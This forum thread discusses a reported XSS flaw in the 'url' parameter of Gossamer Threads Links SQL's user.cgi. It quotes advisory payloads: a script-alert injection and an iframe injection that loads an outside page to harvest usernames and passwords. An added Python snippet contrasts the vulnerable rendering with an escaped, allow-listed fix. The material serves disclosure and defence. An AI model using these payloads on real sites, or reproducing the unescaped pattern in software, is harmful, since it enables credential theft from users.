Gossamer Forum

XSS vulnerability: is it a problem?

Hello, is the following really a problem?
I didn't find anything in the forum.
It's from http://www.nessus.org

The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden field in the login form and can be passed directly to user.cgi in the form of user.cgi?url="xyz". The URL variable is client side input created by the browser when a user clicks on a link which requires authentication. After authentication the user is redirected to the URL in the URL variable. This URL variable does not sufficiently validate the client side input and is therefore vulnerable to script injection and cross site scripting (XSS) attacks.

This is a standard XSS vulnerability.

Note an attacker would normally obfuscate the linking code, but for these examples I have made it simple for the sake of understanding.

Simple Example 1 (pop-up):
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate

Resulting in the following being injected into the HTML:
<input type="hidden" name="url" value=""><script>alert("XSS Vulnerability")</script><"" />

Simple Example 2 (iframe to steal username and password):
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from=rate

regards
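As an added illustration (not the original poster's, Nessus's, or Gossamer Threads' code), the Python below reproduces the rendering pattern the advisory describes, a hidden field whose value is interpolated unescaped, next to a hardened version. The function names and the site-relative allow-list for the redirect target are assumptions; the payloads are the advisory's two examples, URL-decoded.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs: the advisory's payloads after URL decoding.
PAYLOAD_SCRIPT = '"><script>alert("XSS Vulnerability")</script><"'
PAYLOAD_IFRAME = ('"><iframe src="http://www.stationx.net/linksql.html" '
                  'scrolling="No" align="MIDDLE" width="100%" height="3000" '
                  'frameborder="No"></iframe><!--')


def render_hidden_url_vulnerable(url: str) -> str:
    """The pattern the advisory describes: the query parameter is dropped
    into the attribute as-is, so a '"' in it closes the attribute and the
    remainder of the value is parsed as markup."""
    return '<input type="hidden" name="url" value="%s" />' % url


def safe_local_url(url: str, default: str = "/") -> str:
    """Hypothetical allow-list for the post-login redirect target: accept
    only a site-relative path (no scheme, no host, no protocol-relative
    '//'), otherwise fall back to a fixed default."""
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:
        return default
    if not url.startswith("/") or url.startswith("//"):
        return default
    return url


def render_hidden_url_hardened(url: str) -> str:
    """Validate the value first, then HTML-escape it with quote=True so
    neither '"' nor '<' can terminate the attribute or open a tag."""
    value = html.escape(safe_local_url(url), quote=True)
    return '<input type="hidden" name="url" value="%s" />' % value
```

Escaping on output is what closes the injection; the allow-list is an extra check because the same parameter also decides where the user is redirected after login.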

Re: [manne] XSS vulnerability: is it a problem?
We have an announcement about this here: http://www.gossamer-threads.com/...orum.cgi?post=281029

Re: [brewt] XSS vulnerability: is it a problem?
Is this a problem in GForum as well? Links SQL seems to be referenced, but since this post is in one of the GForum forums, I wasn't sure.

Re: [SeanP] XSS vulnerability: is it a problem?
There aren't any known XSS vulnerabilities with GForum (as it HTML-escapes everything by default); this was just posted in the wrong forum.